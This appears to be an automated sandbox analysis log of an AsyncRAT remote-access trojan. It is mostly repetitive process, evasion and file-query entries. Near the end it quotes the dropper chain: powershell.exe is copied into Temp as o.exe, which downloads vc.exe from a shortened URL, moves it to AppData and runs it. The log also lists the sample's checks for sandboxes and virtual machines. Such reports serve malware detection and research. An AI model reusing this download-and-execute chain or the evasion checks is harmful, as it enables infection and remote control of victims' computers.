      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Yara detected AsyncRATShow sources
      Source: Yara matchFile source: 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: vc.exe PID: 4896, type: MEMORY
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
      Source: vc.exe, 00000020.00000002.529207306.0000000003B41000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLHEAD
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\o.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Roaming\vc.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 891Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 809Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 1424Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 460Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 1335
      Source: C:\Users\user\AppData\Local\Temp\o.exeWindow / User API: threadDelayed 422
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6132Thread sleep count: 891 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2044Thread sleep count: 809 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1872Thread sleep time: -3689348814741908s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2124Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6740Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 2220Thread sleep count: 1424 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6136Thread sleep count: 460 > 30Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 1264Thread sleep time: -2767011611056431s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6732Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6664Thread sleep count: 1335 > 30
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6620Thread sleep count: 422 > 30
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128Thread sleep time: -3689348814741908s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6128Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 4276Thread sleep count: 93 > 30
      Source: C:\Users\user\AppData\Local\Temp\o.exe TID: 6968Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\vc.exe TID: 3216Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_0125C197 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,14_2_0125C197
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\powershell.exeJump to behavior
      Source: o.exe, 00000010.00000002.397800415.000000000565B000.00000004.00000001.sdmp, o.exe, 00000011.00000002.423626227.0000000004AA7000.00000004.00000001.sdmpBinary or memory string: Hyper-V
      Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: vc.exe, 00000020.00000002.521796499.0000000002B41000.00000004.00000001.sdmpBinary or memory string: vmware
      Source: o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp, o.exe, 00000010.00000002.397427961.0000000005592000.00000004.00000001.sdmp, o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
      Source: vc.exe, 00000020.00000002.534814534.0000000007661000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: vc.exe, 00000020.00000002.534536689.00000000075C0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
      Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: vc.exe, 00000020.00000002.535485380.0000000007CC0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\vc.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_01259E90 SetUnhandledExceptionFilter,14_2_01259E90
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: 14_2_01259BEC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_01259BEC
      Source: C:\Users\user\AppData\Local\Temp\o.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\Robocopy.exe robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata'Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\o.exe C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeProcess created: C:\Users\user\AppData\Roaming\vc.exe C:\Users\user\AppData\Roaming\vc.exe
      Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: vc.exe, 00000020.00000002.519471545.0000000001560000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\AppData\Local\Temp\o.exeCode function: GetLocaleInfoW,wcsncmp,14_2_0125D111
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\Robocopy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\Robocopy.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\o.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
